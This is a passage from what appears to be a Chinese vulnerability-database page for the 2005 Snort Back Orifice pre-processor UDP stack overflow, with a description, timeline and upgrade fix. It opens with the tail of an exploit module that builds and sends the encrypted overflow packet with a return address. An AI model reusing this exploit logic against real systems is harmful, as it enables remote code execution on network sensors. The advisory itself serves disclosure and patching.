			bocrypt(boheader+payload.encode+filler+[target.ret].pack('V'))
		)
		
		handler
		disconnect_udp
	end

end

    

- 漏洞信息

20034
Snort Back Orifice Pre-Processor UDP Packet Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

A remote overflow exists in Snort. The Back Orifice Pre-Processor fails to validate UDP packets resulting in a stack overflow. With a specially crafted UDP packet, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2005-10-18 Unknow
2005-10-25 Unknow

- 解决方案

Upgrade to version 2.4.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站